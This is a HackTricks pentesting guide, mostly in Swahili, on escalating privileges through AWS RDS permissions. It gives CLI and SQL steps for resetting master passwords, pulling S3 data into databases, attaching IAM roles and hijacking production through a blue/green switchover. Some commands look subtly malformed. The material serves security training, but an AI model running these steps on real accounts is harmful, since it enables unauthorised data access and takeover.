AWS - RDS Privesc

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

RDS - Huduma ya Hifadhidata ya Kihusiano

Kwa taarifa zaidi kuhusu RDS angalia:

AWS - Relational Database (RDS) Enum

rds:ModifyDBInstance

Kwa ruhusa hiyo mshambulizi anaweza kubadilisha nenosiri la mtumiaji mkuu, na taarifa za kuingia ndani ya hifadhidata:

# Get the DB username, db name and address
aws rds describe-db-instances

# Modify the password and wait a couple of minutes
aws rds modify-db-instance \
--db-instance-identifier <db-id> \
--master-user-password 'Llaody2f6.123' \
--apply-immediately

# In case of postgres
psql postgresql://<username>:<pass>@<rds-dns>:5432/<db-name>

Warning

Utahitaji kuweza kuwasiliana na database (kwa kawaida zinaweza kupatikana tu kutoka ndani ya mitandao).

Athari Inayowezekana: Kupata taarifa nyeti ndani ya databases.

rds-db:connect

Kulingana na docs mtumiaji mwenye ruhusa hii anaweza kuunganishwa kwenye DB instance.

Kutumia vibaya ruhusa za RDS Role IAM

Postgresql (Aurora)

Tip

Ikiwa ukiendesha SELECT datname FROM pg_database; ukapata database inayoitwa rdsadmin, unajua uko ndani ya AWS postgresql database.

Kwanza, unaweza kukagua ikiwa database hii imetumika kufikia huduma nyingine yoyote ya AWS. Unaweza kukagua hili kwa kuangalia extensions zilizowekwa:

SELECT * FROM pg_extension;

Ikiwa utapata kitu kama aws_s3 unaweza kudhani hifadhidata hii ina aina fulani ya ufikiaji juu ya S3 (kuna viendelezi vingine kama aws_ml na aws_lambda).

Pia, ikiwa una ruhusa za kuendesha aws rds describe-db-clusters unaweza kuona pale kama cluster has any IAM Role attached katika uwanja AssociatedRoles. Ikiwa ipo, unaweza kudhani kwamba hifadhidata ilitayarishwa ili kufikia huduma nyingine za AWS. Kulingana na jina la role (au ikiwa unaweza kupata idhinishaji za role) unaweza kubashiri ni upatikanaji gani wa ziada hifadhidata ina.

Sasa, ili kusoma faili ndani ya bucket unahitaji kujua njia kamili. Unaweza kuisoma kwa:

// Create table
CREATE TABLE ttemp (col TEXT);

// Create s3 uri
SELECT aws_commons.create_s3_uri(
'test1234567890678', // Name of the bucket
'data.csv',          // Name of the file
'eu-west-1'          //region of the bucket
) AS s3_uri \gset

// Load file contents in table
SELECT aws_s3.table_import_from_s3('ttemp', '', '(format text)',:'s3_uri');

// Get info
SELECT * from ttemp;

// Delete table
DROP TABLE ttemp;

Kama ungekuwa na raw AWS credentials, ungeweza pia kuzitumia kufikia data za S3 kwa:

SELECT aws_s3.table_import_from_s3(
't', '', '(format csv)',
:'s3_uri',
aws_commons.create_aws_credentials('sample_access_key', 'sample_secret_key', '')
);

Note

Postgresql haihitaji kubadilisha parameter group variable yoyote ili kuweza kufikia S3.

Mysql (Aurora)

Tip

Ndani ya mysql, ukikimbia query SELECT User, Host FROM mysql.user; na kuna mtumiaji aitwaye rdsadmin, unaweza kudhani uko ndani ya AWS RDS mysql db.

Ndani ya mysql tumia show variables; na ikiwa variables kama aws_default_s3_role, aurora_load_from_s3_role, aurora_select_into_s3_role, zina thamani, unaweza kudhani database imeandaliwa kufikia data ya S3.

Pia, ikiwa una ruhusa kukimbia aws rds describe-db-clusters unaweza kukagua kama cluster ina role iliyohusishwa, ambayo kwa kawaida inamaanisha upatikanaji wa AWS services).

Sasa, ili kusoma faili ndani ya bucket unahitaji kujua path kamili. Unaweza kuisoma kwa:

CREATE TABLE ttemp (col TEXT);
LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
SELECT * FROM ttemp;
DROP TABLE ttemp;

rds:AddRoleToDBCluster, iam:PassRole

Mshambuliaji mwenye ruhusa rds:AddRoleToDBCluster na iam:PassRole anaweza kuongeza role iliyobainishwa kwenye RDS instance iliyopo. Hii inaweza kumruhusu mshambuliaji kupata data nyeti au kubadilisha data ndani ya RDS instance.

aws add-role-to-db-cluster --db-cluster-identifier <value> --role-arn <value>

Potential Impact: Kufikia data nyeti au mabadiliko bila idhini kwa data kwenye RDS instance.
Kumbuka kwamba baadhi ya DBs zinahitaji usanidi wa ziada kama Mysql, ambazo zinahitaji kutaja role ARN pia katika parameter groups.

rds:CreateDBInstance

Kwa ruhusa hii pekee mshambuliaji anaweza kuunda instance mpya ndani ya cluster ambayo tayari ipo na ina IAM role imeambatishwa. Mshambuliaji hatoweza kubadilisha nenosiri la mtumiaji mkuu, lakini anaweza kufichua instance mpya ya database kwa intaneti:

aws --region eu-west-1 --profile none-priv rds create-db-instance \
--db-instance-identifier mydbinstance2 \
--db-instance-class db.t3.medium \
--engine aurora-postgresql \
--db-cluster-identifier database-1 \
--db-security-groups "string" \
--publicly-accessible

rds:CreateDBInstance, iam:PassRole

Note

TODO: Test

Mshambuliaji mwenye ruhusa rds:CreateDBInstance na iam:PassRole anaweza kuunda instance mpya ya RDS yenye role iliyobainishwa imeambatishwa. Mshambuliaji anaweza kisha kwa uwezekano kupata data nyeti au kubadilisha data ndani ya instance hiyo.

Warning

Some requirements of the role/instance-profile to attach (from here):

  • The profile must exist in your account.
  • The profile must have an IAM role that Amazon EC2 has permissions to assume.
  • The instance profile name and the associated IAM role name must start with the prefix AWSRDSCustom .
aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole

Potential Impact: Ufikiaji wa taarifa nyeti au mabadiliko yasiyoruhusiwa kwenye data katika RDS instance.

rds:AddRoleToDBInstance, iam:PassRole

Attacker aliye na ruhusa rds:AddRoleToDBInstance na iam:PassRole anaweza kuongeza role iliyobainishwa kwenye RDS instance iliyopo. Hii inaweza kumruhusu attacker kupata taarifa nyeti au kubadilisha data ndani ya RDS instance.

Warning

DB instance lazima iwe nje ya cluster kwa hili

aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name <feat-name>

Athari Inayowezekana: Ufikiaji wa data nyeti au mabadiliko yasiyoruhusiwa kwa data katika instance ya RDS.

rds:CreateBlueGreenDeployment, rds:AddRoleToDBCluster, iam:PassRole, rds:SwitchoverBlueGreenDeployment

Mshambuliaji mwenye ruhusa hizi anaweza ku-clone database ya production (Blue), kuambatanisha role ya IAM yenye mamlaka ya juu kwenye clone (Green), kisha kutumia switchover kubadilisha mazingira ya production. Hii inamhakikishia mshambuliaji kuinua mamlaka ya database na kupata ufikiaji usiotoruhusiwa kwa rasilimali nyingine za AWS.

# Create a Green deployment (clone) of the production cluster
aws rds create-blue-green-deployment \
--blue-green-deployment-name <name> \
--source <production-db-cluster-arn>

# Attach a high-privilege IAM role to the Green cluster
aws rds add-role-to-db-cluster \
--db-cluster-identifier <green-cluster-id> \
--role-arn <high-privilege-iam-role-arn>

# Switch the Green environment to Production
aws rds switchover-blue-green-deployment \
--blue-green-deployment-identifier <deployment-id>

Athari Inayoweza Kutokea: Kuchukua kikamilifu mazingira ya hifadhidata ya uzalishaji. Baada ya kuhamishwa, hifadhidata inafanya kazi kwa ruhusa zilizoinuliwa, ikiruhusu ufikiaji usioidhinishwa kwa huduma nyingine za AWS (kwa mfano, S3, Lambda, Secrets Manager) kutoka ndani ya hifadhidata.

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks